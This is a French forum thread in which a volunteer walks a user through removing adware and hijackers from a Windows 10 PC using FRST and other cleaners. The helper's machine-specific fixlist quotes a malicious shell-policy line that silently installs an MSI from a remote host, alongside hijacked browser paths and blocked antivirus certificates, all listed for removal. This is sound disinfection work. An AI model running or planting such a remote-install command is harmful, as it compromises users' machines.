Votre question
Résolu

Pc probablement infecté, malwarebytes et le centre de sécuritée windows ne se lancent pas. Toute aide est la bienvenue!

Tags :
  • Malware
  • Sécurité
Dernière réponse : dans Sécurité et virus
9 Septembre 2017 14:39:50

Bonjour! Mon pc est infecté depuis un moment ( je pense, j'avait des adware en quantitée mais un passage de malwarebytes suffisait a nettoyer mon pc pour un moment.) Toutefois ces dernier temps je n'ai réussis a lancer que roguekiller et adwcleaner, et le problème persiste. J'ai aussi perdu l'acces à edge et chrome, j'ai le message "Impossible d'ouvrir "l'app concernée" à l'aide du compte Administrateur integré. Connectez vous avec un autre compte puis réessayez." Je vais avoir besoin de ce pc fonctionnel dans les 3 semaines qui viennent, si vous pouviez m'aidez je vous en serait trés reconnaissant.
Le pc:
Asus K551L
I5 4200U
4go ram

Windows version 1607 14393.1480

Autres pages sur : probablement infecte malwarebytes centre securitee windows lancent aide bienvenue

a b 8 Sécurité
9 Septembre 2017 16:18:02

Bonsoir korrosh,

Pour commencer vous allez faire un diagnostic de votre ordinateur avec l'outil FRST

Télécharger sur votre Bureau << IMPORTANT pas ailleurs
Selon votre système exploitation 32 Bit ou 64 Bits Mon ordinateur exécute-t-il la version 32 ou 64 ?bits
Farbar Recovery Scan Tool pour systèmes x32 (x86)
Farbar Recovery Scan Tool Pour systèmes x64

    Ferme toutes les applications en cours (notamment votre navigateur)
  • Faites un clique droit sur le fichier téléchargé (FRST.exe) et choisissez Exécuter en tant qu'administrateur
  • puis cliquez sur 'Exécuter' lors de l'Avertissement de sécurité - Fichier ouvert.
    Quand l'outil démarre, cliquez sur Oui si vous acceptez les termes de la fenêtre Disclaimer (clause de non-responsabilité).

  • Cochez les cases comme sur la capture
  • Cliquez sur le bouton ANALYSE.
  • L'outil va créer un fichier rapport [log] nommé FRST.txt situé dans le dossier depuis lequel l'outil s'exécute.
  • La première fois où l'outil est exécuté, il crée un autre rapport nommé Addition.txt - situé également dans le même dossier que FRST.exe.
  • Héberge les rapports sur le site ce service de rapport en ligne
    Appuyez sur Parcourir et chercher les rapports sur le bureau
  • Cliquez sur Ouvrir
  • Cliquez sur ENVOI,
    Puis copie/colle les liens fourni ICI dans votre prochaine réponse.

    m
    0
    l
    a b 8 Sécurité
    9 Septembre 2017 22:16:09

    Bonsoir,


    Présence d'infection par adwares/hijackers qui se sont installés avec ton consentement,

    Il faut résoudre ce problème Il ne reste plus beaucoup d'espace libre sur ton disque.
    Citation :
    Drive c: (OS) (Fixed) (Total:279.45 GB) (Free:9.58 GB) NTFS

    Il faut faire de la place pour un bon fonctionnement du système.
    Déplace sur un support externe (clé USB ou disque) photo,vidéo,musique,PDF etc..
    Désinstalle des jeux que tu n'utilises plus qui prenne beaucoup de place.


    Désinstalle via Panneau de configuration >> programmes et fonctionnalités (si présents) :
    uTorrent P2P (source d'infection multiple) Les risques du peer-to-peer
    KMSpico (activateur illégal des programmes Microsoft)
    (Les cracks et keygens sont des vecteurs de malwares et d'infections.)
    Le danger des cracks !.
    BikaQ Rss (néfaste)
    WeatherBuddy (idem)
    WinSnare (idem)
    AlphaGo ""
    Tout ce qui concerne IObit
    Java 8 Update 111 (version obsolète)
    Java 8 Update 131 (idem)
    Microsoft Office Professionnel Plus 2016 (cracker)

    Lorsque c'est fait pour que l'on puisse nettoyer ton ordinateur exécute un nouveau diagnostic de votre ordinateur avec l'outil FRST pense a cocher la case Addition.txt
    Héberge les rapports sur le site ce service de rapport en ligne
    Puis copie/colle les liens fourni ICI dans votre prochaine réponse.
    m
    0
    l
    10 Septembre 2017 12:13:03

    Bonjour!
    FRST:
    https://up.security-x.fr/file.php?h=R459de7db82c7bfda9a...
    Aditions:
    https://up.security-x.fr/file.php?h=Ra3ff285033b47fa628...

    J'ai fait de la place sur mon disque et j'ai pu tout supprimer a l'exception de Winsnare. lorsque je tente de le désinstaller j'ai le message "The feature you are trying to use is on a network ressource that is unavailable. Click OK to try again, or enter an alternate path to a folder containing the installation package 'WinSnare.msi' in the box below.
    Le chemin proposé par défaut est:
    C:\WINDOWS\TEMP\winsap_update\
    m
    0
    l
    a b 8 Sécurité
    10 Septembre 2017 15:32:17

    Bonjour,

    Merci pour l'information en va essayer de le supprimer autrement.
    Ok c'est un peu mieux il y a maintenant (Free:30.22 GB) d'espace libre le système va un peu mieux fonctionner.

    IMPORTANT Vérifie que la restauration système soit bien configurer pour le pourcentage de l'espace Activer la protection du système – Windows 10

    Ne passez qu'une seule fois les outils

    • Vous allez faire une correction Farbar Recovery Scan Tool
    • Ouvrez le Bloc-notes (notepad).
    • Copiez le contenu de la zone code ci-dessous.
    • Pour ce faire, sélectionnez toutes les lignes, de start jusqu’à end
    • faites un clique droit et choisis Copier.
    • Collez ceci dans la fenêtre ouverte du Bloc-notes.
    • Dans la page du Bloc-notes Clique en haut sur Fichier >> puis enregistrer sous
    • Sur la nouvelle page
    • Fait le choix de bureau >> dans la fenêtre Nom du fichier
    • Tape le nom fixlist.txt et clique sur Enregistrer le fichier.
    • Le fichier ce trouve maintenant sur le bureau
      start
      CreateRestorePoint:
      CloseProcesses:
      Hosts:
      RemoveProxy:
      EmptyTemp:
      HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ATTENTION
      HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION
      HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ATTENTION
      HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION
      HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ATTENTION
      HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION
      HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ATTENTION
      HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION
      HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ATTENTION
      HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION
      HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ATTENTION
      HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION
      HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ATTENTION
      HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION
      HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ATTENTION
      HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION
      HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ATTENTION
      HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION
      HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ATTENTION
      HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION
      HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ATTENTION
      HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION
      HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ATTENTION
      HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION
      HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ATTENTION
      HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION
      HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ATTENTION
      HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ATTENTION
      HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION
      HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ATTENTION
      HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION
      HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ATTENTION
      HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION
      HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ATTENTION
      HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION
      HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ATTENTION
      HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION
      HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ATTENTION
      HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION
      HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ATTENTION
      HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION
      HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ATTENTION
      HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION
      HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ATTENTION
      HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION
      HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
      HKU\S-1-5-21-928489463-4109636695-2218132778-1001\...\Run: [KSHCG1OL4SWME86] => C:\Program Files\Y5KR1LL44D\Y5KR1LL44.exe [1040896 2017-07-22] (7)
      HKU\S-1-5-21-928489463-4109636695-2218132778-1001\...\Run: [FGWACSASV1X014I] => C:\Program Files (x86)\iw2vwnzg23e\1AZRA.exe [1040896 2017-07-22] (7)
      HKU\S-1-5-21-928489463-4109636695-2218132778-1001\...\Run: [X8L62LXMLQNDDQE] => C:\Program Files\8GEW5JKN9H\8GEW5JKN9.exe [1040896 2017-07-22] (7)
      HKU\S-1-5-21-928489463-4109636695-2218132778-1001\...\Run: [U1R764XMHHQ3R2Z] => C:\Program Files\VG6K6NSASB\VG6K6NSAS.exe [1040896 2017-07-22] (7)
      HKU\S-1-5-21-928489463-4109636695-2218132778-1001\...\Run: [XDEC7VYK896GM01] => C:\Program Files\Z7SB8BT91Z\CWZQGAZA0.exe [1040896 2017-07-22] (7)
      HKU\S-1-5-21-928489463-4109636695-2218132778-1001\...\Run: [AOBYUVC6F2HZ6ME] => C:\Program Files\DPC5D0HG9N\XI76L3K13.exe [1040896 2017-07-22] (IPG0EPF)
      HKU\S-1-5-21-928489463-4109636695-2218132778-1001\...\Run: [QLVEOJS4B5H29KX] => C:\Program Files\K3IT9IN1FJ\C1RZDVYXH.exe [1040896 2017-07-24] (67YY4G2)
      HKU\S-1-5-21-928489463-4109636695-2218132778-1001\...\Run: [36LE9OCUL8O6MBK] => C:\Program Files\RWUC090HX6\RWUC090HX.exe [1040896 2017-07-24] (67YY4G2)
      HKU\S-1-5-21-928489463-4109636695-2218132778-1001\...\Run: [NRBT8UYTRY6SB4C] => C:\Program Files\4596U8DBZO\AAUKXRGBQ.exe [1040896 2017-07-24] (GTJN)
      HKU\S-1-5-21-928489463-4109636695-2218132778-1001\...\Run: [d033hmei30n] => C:\Users\Valentin\AppData\Roaming\0sdmciqc3xn\nwpwy1u5e2b.exe [7168 2017-09-09] ()
      HKU\S-1-5-21-928489463-4109636695-2218132778-1001\...\Run: [L1FQRYLPZCUZ5UM] => C:\Program Files\ZLAATB2A8W\FV6RHGCHU.exe [1220096 2017-09-09] (8HU1GXL)
      HKU\S-1-5-21-928489463-4109636695-2218132778-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj1SFkFcNWQXM8E2RkM3OTM5NWk5MjzXRWEcFjq5NkVYNF== /q <==== ATTENTION
      GroupPolicy: Restriction - Chrome <==== ATTENTION
      Edge HomeButtonPage: HKU\S-1-5-21-928489463-4109636695-2218132778-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=1493998773&z=
      FF Extension: (Pas de nom) - C:\Program Files (x86)\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59} [2017-09-09]
      CHR res: infecté resources.pak (search_engine). Réinstallez Chrome. <==== ATTENTION
      HKU\.DEFAULT\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Ballcine\Application\chrome.exe <==== ATTENTION
      HKU\S-1-5-21-928489463-4109636695-2218132778-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Zoohair\Application\chrome.exe <==== ATTENTION
      HKU\S-1-5-18\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Ballcine\Application\chrome.exe <==== ATTENTION
      R2 LiveUpdateSvc; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [3046688 2016-12-16]
      U2 CWASRE; pas de ImagePath
      S1 roheckcy; \??\C:\WINDOWS\system32\drivers\roheckcy.sys [X]
      U2 snare; pas de ImagePath
      2017-09-09 15:46 - 2017-09-09 15:46 - 000000000 ____D C:\Users\Valentin\AppData\Roaming\0sdmciqc3xn
      2017-09-09 15:46 - 2017-09-09 15:46 - 000000000 ____D C:\Program Files\ZLAATB2A8W
      2017-08-23 17:50 - 2017-08-23 17:50 - 000000000 ____D C:\Program Files\D4M77OL2R8
      2017-08-23 17:49 - 2017-09-09 13:22 - 000000000 ____D C:\Users\Valentin\AppData\Roaming\65be57a006b244d7b8c91682f7312b6c
      2017-08-23 17:49 - 2017-09-09 13:22 - 000000000 ____D C:\ProgramData\cabaa219013e46f2a26c51dd20621f02
      2017-08-23 17:49 - 2017-08-23 17:49 - 000000000 ____D C:\Users\Valentin\AppData\Roaming\nwual3jclav
      2017-08-23 17:48 - 2017-09-09 13:23 - 000000000 ____D C:\Program Files\BPJ56VXDVP
      2017-08-23 17:48 - 2017-08-23 17:48 - 000000000 ____D C:\Users\Valentin\AppData\Roaming\lampck022lw
      2017-08-22 17:29 - 2017-08-22 17:29 - 000003202 _____ C:\WINDOWS\System32\Tasks\WIEbUQmIZZMLsT
      2017-08-22 17:29 - 2017-08-22 17:29 - 000002866 _____ C:\WINDOWS\System32\Tasks\NijCcSNlmGRxRfW2
      2017-08-22 17:29 - 2017-08-22 17:29 - 000000000 ____D C:\Program Files (x86)\mpqyBmhjBIE
      2017-08-22 17:29 - 2017-08-22 17:29 - 000000000 ____D C:\Program Files (x86)\IRPkkdMeRFMU2
      2017-08-22 17:28 - 2017-09-09 15:42 - 000000308 _____ C:\WINDOWS\Tasks\NijCcSNlmGRxRfW.job
      2017-08-22 17:28 - 2017-08-22 17:29 - 000000000 ____D C:\Program Files (x86)\xfhVDKCuU
      2017-08-22 17:28 - 2017-08-22 17:28 - 000002628 _____ C:\WINDOWS\System32\Tasks\NijCcSNlmGRxRfW
      2017-08-22 17:28 - 2017-08-22 17:28 - 000000000 ____D C:\Users\Valentin\AppData\Local\wISoYqyczfZKJnMxj
      2017-08-22 17:28 - 2017-08-22 17:28 - 000000000 ____D C:\Program Files (x86)\kaYbSovMLBUn
      2017-09-09 13:24 - 2017-07-24 19:09 - 000000000 ____D C:\Program Files (x86)\zU3v2hLfDo
      2017-09-09 13:24 - 2017-07-22 22:22 - 000000000 ____D C:\Program Files (x86)\2qagYXoSXy
      2017-09-09 13:24 - 2017-07-22 22:20 - 000000000 ____D C:\Program Files (x86)\t7gSPabjRe
      2017-09-09 11:55 - 2017-02-08 14:22 - 000000000 ____D C:\Users\Valentin\AppData\Roaming\IObit
      2017-09-09 11:55 - 2017-02-08 14:21 - 000000000 ____D C:\ProgramData\IObit
      2017-09-09 11:36 - 2017-06-09 08:39 - 000000000 ____D C:\Users\Robot\AppData\Roaming\IObit
      2017-09-09 11:36 - 2017-02-08 14:22 - 000000000 ____D C:\Users\Valentin\AppData\LocalLow\IObit
      2017-08-23 17:56 - 2017-05-01 23:59 - 000003654 _____ C:\WINDOWS\System32\Tasks\AutoKMS
      C:\Program Files (x86)\iw2vwnzg23e\OP24CD8K9KGRT76.exe
      C:\WINDOWS\TEMP\winsap_update\
      WinSnare (HKLM-x32\...\{7AC6FFC5-B011-4452-A0B7-58065AAD2932}) (Version: 4.3.7 - WinSnare) <==== ATTENTION
      HKU\S-1-5-21-928489463-4109636695-2218132778-1001\...\ChromeHTML: -> "C:\Program Files (x86)\Zoohair\Application\chrome.exe" "%1" <==== ATTENTION
      Task: {0B331FD7-2C2C-4FE4-81DA-08B421610B3D} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Pas de fichier
      Task: {1B933251-E825-4452-A736-F1FB0B201528} - \Thovuy -> Pas de fichier
      Task: {1FBE063A-B696-40A2-88B3-1E5FEC1CD764} - System32\Tasks\NijCcSNlmGRxRfW => rundll32 "C:\Program Files (x86)\xfhVDKCuU\gzgy0c7.dll",#1
      Task: {362181ED-8AAA-493B-AFDF-8B18FC8E07EE} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Pas de fichier
      Task: {4372223E-B8BB-448C-B797-228FA596EFCA} - System32\Tasks\Shogory Manager => C:\Program Files (x86)\Letegeshopother\pretase.exe
      Task: {456A5759-352E-4F5D-ACD5-6A9ACB8B7380} - System32\Tasks\NijCcSNlmGRxRfW2 => rundll32 "C:\Program Files (x86)\xfhVDKCuU\gzgy0c7.dll",#1
      Task: {5520C023-E359-4AC2-AEDF-CEC178426EB1} - System32\Tasks\eac8217f772dd6abd0f9e2b9a5d86a25 => sc start eac8217f772dd6abd0f9e2b9a5d86a25 <==== ATTENTION
      Task: {5A40C8EB-182D-4FD5-92AC-665715ED7F13} - System32\Tasks\WIEbUQmIZZMLsT => rundll32 "C:\Program Files (x86)\IRPkkdMeRFMU2\yNrkkkR.dll",#1
      Task: {7B77019E-DD41-4D86-A571-CCDABA82092F} - \Windows-PG -> Pas de fichier <==== ATTENTION
      Task: {8181B4D2-1723-45B5-BB6E-95305AD62434} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Pas de fichier <==== ATTENTION
      Task: {857CAB54-B713-4111-8A21-77B614B05A48} - pas de chemin du fichier
      Task: {91668DC2-FABF-47BB-8F2A-8937573855AA} - pas de chemin du fichier
      Task: {B02EA384-A7F9-4CD3-89F1-D8CE1D20386E} - System32\Tasks\Yx9iuGowkK => C:\Program Files (x86)\t7gSPabjRe\updengine.exe <==== ATTENTION
      Task: {C9BAD04F-1670-4100-80C2-82195F4B093D} - System32\Tasks\GEN => C:\Users\Valentin\AppData\Local\Programs\GEN\GEN.exe <==== ATTENTION
      Task: {CB7A6299-F7E7-464B-9671-DC6E7DB7E75C} - pas de chemin du fichier
      Task: {D2231A52-44D4-440C-99BF-D0A830B39FC3} - System32\Tasks\uOaIl15QOQ => C:\Program Files (x86)\2qagYXoSXy\updengine.exe <==== ATTENTION
      Task: {D94C069D-C47B-4A77-911B-B6DAF5B779E9} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
      Task: {F04C43A9-3204-428B-BED1-C4CF6C21E45E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Pas de fichier
      Task: {F4B62EA9-5806-4D10-9072-A0D3E217FAA3} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Pas de fichier
      Task: {F5E70C9B-355C-4DA1-B087-E7BAC6446503} - \AutoPico Daily Restart -> Pas de fichier <==== ATTENTION
      cmd: ipconfig /flushdns
      end

      NOTE. Il est important que les deux ,L'outil FRST et le fichierfixlist.txt se trouvent dans le même emplacement, sur le bureau sinon la correction ne fonctionnera pas.

      NOTICE: Ces lignes ont été écrites spécialement pour cet utilisateur,
      pour être utilisées exclusivement sur ce PC. Exécuter ces instructions sur une autre machine pourrait endommager le système d'exploitation.



      Exécutez FRST,
    • cliquez une seule fois sur le bouton Corriger et attendez.
      Si, pour une raison quelconque, l'outil a besoin d'un redémarrage, laissez le système redémarrer normalement.
    • Ensuite laissez l'outil terminer son travail.
      Quand il a fini, FRST va créer un rapport placé sur le Bureau (Fixlog.txt).
    • Héberge le rapport présent sur ton bureau sur le site ,ce service de rapport en ligne
      Puis copie/colle le lien fourni dans ta prochaine réponse.


    • Télécharges Adwcleaner sur ton Bureau
      Désactivez vos protections: antivirus, ... Ferme toutes les applications en cours (notamment votre navigateur)
      Fais clique droit dessus, exécuter en tant qu'administrateur sous Windows : 7/8/10 et Vista
    • Cliquez sur oui pour Accepter la licence

    • Choisir l'option Analyser
      Ensuite
    • Choisir l'option Nettoyer
    • Acceptez l'avertissement en cliquant sur OK
    • Hébergez le contenu du rapport qui apparaît au redémarrage du PC
      sur le site ce site d'hébergement de fichiers
      Puis copie/colle le lien fourni dans votre prochaine réponse.


    • Télécharge ZHPCleaner de Nicolas Coolman sur votre bureau.
      Désactivez vos protections: antivirus, ... Ferme toutes les applications en cours (notamment votre navigateur)
      Fais un double clique sur l'icône pour le lancer
      Sous Windows Vista / 7 / 8 /10(clique-droit > exécuter en tant qu'administrateur
      Accepte "les conditions d'utilisation"

    • Cliquer sur scanner
      Lorsque le scan est terminé
    • Clique sur Nettoyer
      L'interface de réparation s'affiche sous forme d'onglets où sont listés les éléments détectés. Tous les éléments sont sélectionnés par défaut.
    • Cliquer sur Nettoyer pour lancer la suppression des éléments détectés
      Si un redémarrage est nécessaire pour compléter le nettoyage, cliquer sur OK et redémarrer le système
      Au redémarrage, le rapport de nettoyage ZHPCleaner.txt s'affiche.
      Héberge le rapport ZHPCleaner.txt sur le site ce service de rapport en ligne
      Puis copier/coller le lien fourni dans votre prochaine réponse.

  • Tutoriel ZHPCleaner

    En attente des 3 rapports.

    A plus.
    m
    0
    l
    11 Septembre 2017 21:20:56

    Bonsoir!
    excusez moi du retard, je n'ai pas vu passer la notif de votre réponse..
    J'ai fait les 3 scans (j'avait déjà utilisé adwcleaner auparavant) et je n'ai plus de pop up pour l'instant. toutefois a chaque redémarrage, j'ai une demande d'autorisation de la part de windows a propos d'une application "éditeur vérifié Microsoft Corporation" a l'emplacement "C:\Windows\System32\MRT.exe" le chemin est suivit des caractères "/R/RE" je ne l'ai pas autorisée pour l'instant. J'ai aussi eu des notifications de windows defender qui avait l'air d'être réactivé et qui "supprimait des menaces"
    voici les trois rapports:
    ZHPcleaner:
    https://up.security-x.fr/file.php?h=R7a141a440e8bf509f1...
    FRST:
    https://up.security-x.fr/file.php?h=R2e0cb65b71614080f3...
    ADWcleaner
    https://up.security-x.fr/file.php?h=R33a6519c87ecc3e6fd...
    m
    0
    l
    a b 8 Sécurité
    11 Septembre 2017 23:04:11

    Bonsoir,

    OK c'est bien.
      En complément fait un scan personnalisé avec Malwarebyte's
    • Ouvre MBAM Sur le Tableau de bord, cliquez en haut sur Analyse
    • Après sélectionner Analyse Personnalisé.
    • Puis en bas Configurer l'analyse
    • Cochez toutes les cases des lecteurs
      Puis Lancer l'examen >> Analyse Maintenant
    • Quand l'examen est terminé, SI des éléments ont été Détectés,
    • Appliquer les actions cliquez sur Quarantaine sélectionnée
      Pour laisser MBAM nettoyer ce qui a été détecté.
    • Si un redémarrage est demandé, clique sur OUI.
    • Attendez l'affichage du message vous invitant à faire redémarrer le PC, puis cliquez sur Oui.

    • Après le redémarrage, quand vous êtes de retour sur le Bureau, ouvrez de nouveau MBAM.

    • Cliquez sur l'onglet Comptes-rendus .
    • Faites un double clique sur comptre-rendu d'analyse qui vient d'être effectuée.
    • Cliquez sur Afficher Exporter.
    • Cliquez sur Fichier texte (*.txt)
    • Dans la boîte de dialogue 'Enregistrer le fichier' qui s'est ouverte, cliquez sur le Bureau.
    • Dans la zone Nom du fichier: saisissez un nom pour votre journal d'examen.
    • Une boîte de message intitulée Fichier enregistré doit apparaître et vous annoncer que "Votre fichier a été exporté avec succès".
    • Cliquez sur OK
    • Hébergez le contenu du rapport sur le site ce service de rapport en ligne
      Puis copie/colle le lien fourni dans votre prochaine réponse.
      Tutoriel Malwarebytes en images


  • Ensuite dis moi comment se comporte le système par rapport aux symptômes signalés au début ?
    Si c'est bon je te donne le reste des démarches pour terminé cette désinfection.
    m
    0
    l
    12 Septembre 2017 23:06:37

    J'ai tout effectué, Malwarebytes a trouvé des menaces, toutefois elles semblent provenir d'une zone de quarantaine. A chaque démarrage j'ai toujours la notification de l'application de "windows corporation" (décrit dans mon précédent message) je ne l'ai toujours pas autorisé. Autrement toutes les applications (wdefender, malwarebytes, chrome etc...) ont l'air de fonctionner normalement.
    Le compte rendu de MB:
    https://up.security-x.fr/file.php?h=Rd8a20d949142f78ecd...
    m
    0
    l

    Meilleure solution

    a b 8 Sécurité
    12 Septembre 2017 23:25:16

    Bonsoir, :) 

    Ce que trouve Malwarebytes ne sont pas que des infections qui se trouve dans les quarantaines des autres outils de FRST et d'ADWCLEANER. ;) 
    Vide la quarantaine de MBAM
    Ouvre l'outil clique sur Quarantaine >> sélectionne les lignes et clique sur Supprimer.

    Pour ton message Désactive du démarrage de windows Avec CCleaner >> MRT
    Ouvre Ccleaner >> puis dans le menu sur Outils >> Démarrage
    Sélectionne MRT et clique sur Désactiver.
    Redémarre le pc.

    Nous allons pouvoir terminer la procédure plus quelques conseils.
    il faudrait faire les mises à jour de ton système w10 tu as la Version 1607 la dernière c'est la version 1703
    Clique sur le bouton Démarrer >> Paramètres >> Mise à jour et sécurité >> Windows Update >> Rechercher les mises à jour.
    Contrôle la version avec la commande winver

      Vous allez supprimer les outils et purger la restauration.
      Téléchargez DelFix (de Xplode) sur ton Bureau

    • Cochez les cases :
      Supprimer les outils de désinfection
      Purger la restauration système
    • Validez sur Exécuter
    • Laissez travailler l'outil
      Un rapport s'ouvre Copie/colle le rapport obtenu
      Delfix ce supprime automatiquement
      Le rapport ce trouve aussi sur a la base du lecteur C\Defix.txt
    • Hébergez le rapport Defix.txt sur le site ce site d'hébergement de fichiers
      Puis copier/coller le lien fourni dans votre prochaine réponse.


  • Quelques conseils et préventions:
    D'une manière générale, il faut être prudent sur le net et ne pas cliquer sur tout ce qui paraît attrayant
    Toujours privilégier le téléchargement d'une application sur le site de l'éditeur
    Bien lire les accords de licence avant toute installation.
    Prend quelques instants pour lire,
    Lisez d'abord cliquez après !!!

    Attention Les sites de téléchargements qui repackent les programmes
    Des logiciels additionnels sont proposés (barre d'outils, adwares) via l'installation de logiciel gratuit en général ou via certains sites de téléchargement comme Softonic ou 01Net..
    L'éditeur touche de l'argent à chaque installation réussie de ces programmes additionnels (un genre de sponsoring),
    Votre PC se retrouve avec des programmes ou barres d'outils qui ralentissent le navigateur ou des adwares qui ouvrent des popups de publicités.
    De plus, elles enregistrent les sites que tu visites pour les transmettre (tracking) à faire de la publicité ciblée, c'est pas super niveau protection de la vie privée.


    Prudence avec vos Mails et pièces jointes que vous recevez ils renferment parfois des Malwares.(Le phishing ou hameçonnage,SPAM... )
    Souvent, les infections se propagent sur l'ordinateur de cette manière.
    La protection la plus efficace de la messagerie.
    1) Ne pas ouvrir ou cliquer sur les pièces jointes provenant d’un expéditeur que vous ne connaissez pas.
    2) Ne pas ouvrir les pièces jointes d'un email (fichiers .zip, .xls ou .doc) que si l'identité de son expéditeur est confirmée.
    3) Supprimer le message suspect sans y répondre.
    4) Refuser de confirmer l'accusé de réception d'un expéditeur inconnu.
    5) Supprimez le mail directement (évitez de le stocker dans les éléments supprimés)


    Il est important de tenir son système à jour, au niveau des mises à jour Windows Update, sans oublier les logiciels installés.

    IMPORTANT Sauvegarder régulièrement les données personnelles sur un support externe.
    En cas de conflit ou d'infection, vos données ne seront pas perdues

    Vérifier aussi (Si présent sur le PC) d'avoir toujours la dernière version de Java et Flash Player.
    Avec l'outil SX Check&Update de igor51

    De maintenir son Antivirus à jour et analyser le système régulièrement, même chose avec un scan avec Malwarebytes Anti-Malware .

    Aide Conseils de Windows 10 permettant d’améliorer les performances de votre PC
